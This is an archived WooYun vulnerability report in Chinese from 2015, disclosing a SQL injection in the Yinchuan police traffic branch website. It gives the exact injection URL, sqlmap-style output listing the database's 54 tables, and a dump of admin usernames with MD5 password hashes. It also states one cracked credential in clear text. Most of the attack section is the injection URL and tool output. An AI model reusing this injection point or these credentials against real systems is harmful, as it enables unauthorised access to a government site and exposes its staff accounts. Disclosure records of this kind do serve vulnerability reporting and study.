当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0138826

漏洞标题:银川市公安局交通警察分局伪静态注入一枚

相关厂商:银川市公安局

漏洞作者: 尊-折戟

提交时间:2015-09-03 18:16

修复时间:2015-09-08 18:18

公开时间:2015-09-08 18:18

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:已交由第三方合作机构(公安部一所)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-09-03: 细节已通知厂商并且等待厂商处理中
2015-09-08: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

RT!

详细说明:

注入点:

http://www.ycpolice.com/index.php/Index/showlist/Class_ID/21


NXV%%2HAY@U5$91E@XMWV0O.jpg


TZ{4$}L3_$$FVZ`W6)%N(SK.jpg


加个*号即可报错。代入语句

http://www.ycpolice.com/index.php/Index/showlist/Class_ID/21*


35KKM(GQ$4}S}H6GGV39F{H.png


数据库和管理员权限:

B$ODDVAW@~GOZ@X2K0}0H}M.png


8I}7YY_VKESEPXSXXZ[W674.png


current database:    'ycpolice'


[15:24:29] [INFO] resumed: yin_yanhuo
Database: ycpolice
[54 tables]
+------------------+
| yin_about        |
| yin_actions      |
| yin_address      |
| yin_admin        |
| yin_ajcheck      |
| yin_baopozy      |
| yin_bendisfz     |
| yin_cardopen     |
| yin_chenshibp    |
| yin_chujinsi     |
| yin_company      |
| yin_complain     |
| yin_config       |
| yin_constable    |
| yin_customer     |
| yin_daxinhd      |
| yin_department   |
| yin_fenip        |
| yin_findman      |
| yin_gangaodj     |
| yin_gknews       |
| yin_gknewsclass  |
| yin_guideclass   |
| yin_jsxinxi      |
| yin_jubao        |
| yin_liuyan       |
| yin_maps         |
| yin_member       |
| yin_message      |
| yin_mycar        |
| yin_news         |
| yin_node         |
| yin_photos       |
| yin_pthuzhao     |
| yin_reconsider   |
| yin_renzhengma   |
| yin_role         |
| yin_showask      |
| yin_suggestion   |
| yin_user         |
| yin_userguide    |
| yin_waidisfz     |
| yin_wanglaitw    |
| yin_xinserver10  |
| yin_xinserver102 |
| yin_xinserver12  |
| yin_xinserver13  |
| yin_xinserver5   |
| yin_xinserver6   |
| yin_xinserver81  |
| yin_xinserver82  |
| yin_xinserver9   |
| yin_xinzhenfy    |
| yin_yanhuo       |
+------------------+


延时注入很慢。。。。。就跑了主要的!

JX4$1X)M0JRVH]LNJ057]89.png


得到管理员用户和密码。跑完这里花了差不多2个小时,还有好多,不跑了,

Database: ycpolice
Table: yin_admin
+---------------+-----------------------------------+
| AdminName     | AdminPass                         |
+---------------+-----------------------------------+
| admin         | ee702fe1e29a440eff95fbb8f5401b8a  |
| anfang        | d123a7a95ba0bcec6e6be6ba4e1c3f01  |
| baixiaofeng   | c8837b23ff8aaa8a2dde915473ce0991  |
| beijie        | 324d1907d9ca6733d399b87affe48c74  |
| bgs001        | 189103a260b8899ab8d3f524f484369b  |
| bjs           | d41d8cd98f00b204e9800998ecf8427e  |
| bjx001        | f5ee68970ae263e56816d4051807ae52  |
| bjzl001       | c8837b23ff8aaa8a2dde915473ce099   |
|  BTG          | db412c68a444b151308264631876567   |
+---------------+-----------------------------------+


跑的太慢了,就列了前面几个,其中有admin/dc6915681
就这样吧。。

漏洞证明:

数据库和管理员权限:

B$ODDVAW@~GOZ@X2K0}0H}M.png


8I}7YY_VKESEPXSXXZ[W674.png


JX4$1X)M0JRVH]LNJ057]89.png

修复方案:

特殊字符过滤!

版权声明:转载请注明来源 尊-折戟@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-09-08 18:18

厂商回复:

最新状态:

暂无